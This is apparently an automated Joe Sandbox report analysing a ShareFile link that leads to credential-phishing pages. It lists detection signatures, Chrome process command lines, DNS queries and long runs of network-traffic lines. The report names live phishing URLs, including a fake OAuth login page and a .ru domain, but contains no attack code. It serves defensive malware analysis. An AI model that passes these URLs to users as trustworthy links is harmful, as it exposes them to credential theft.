Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91

Overview

General Information

Sample URL:https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91
Analysis ID:1575750
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,17948422447379762883,7660547888404076553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_354JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 3.7.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_354, type: DROPPED
      Source: https://cavotec-au.sharefile.com/share/view/1271a93971714a91Joe Sandbox AI: Page contains button: 'Preview or Download' Source: '2.6.pages.csv'
      Source: https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmHTTP Parser: Number of links: 0
      Source: https://cavotec-au.sharefile.com/share/view/1271a93971714a91HTTP Parser: Base64 decoded: {"version":3,"sources":["webpack://./node_modules/react-loading-skeleton/dist/skeleton.css"],"names":[],"mappings":"AAAA;EACE;IACE,2BAA2B;EAC7B;AACF;;AAEA;EACE,qBAAqB;EACrB,0BAA0B;EAC1B,0BAA0B;EAC1B,6BAA6B;EAC7B,+BAA+B,EAAE,qBAAqB;;EAEtD,mCAAmC;;EAEnC,WAA...
      Source: https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmHTTP Parser: Title: ****---*** does not match URL
      Source: https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmHTTP Parser: No favicon
      Source: https://s7ol.lomifor.ru/oONm9/#Tasdfasdfa@wp.plHTTP Parser: No favicon
      Source: https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmHTTP Parser: No <meta name="author".. found
      Source: https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htmHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49862 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: global trafficDNS traffic detected: DNS query: cavotec-au.sharefile.com
      Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.us-east-1.sdk.awswaf.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
      Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: cavotec-au.sf-api.com
      Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-content.customer.pendo.io
      Source: global trafficDNS traffic detected: DNS query: piletfeed-cdn.sharefile.io
      Source: global trafficDNS traffic detected: DNS query: o49063.ingest.sentry.io
      Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
      Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
      Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
      Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-data.customer.pendo.io
      Source: global trafficDNS traffic detected: DNS query: sf-cv.sharefile.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: wordonline.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: victoryacademytc.com
      Source: global trafficDNS traffic detected: DNS query: s7ol.lomifor.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: amcdn.msftauth.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
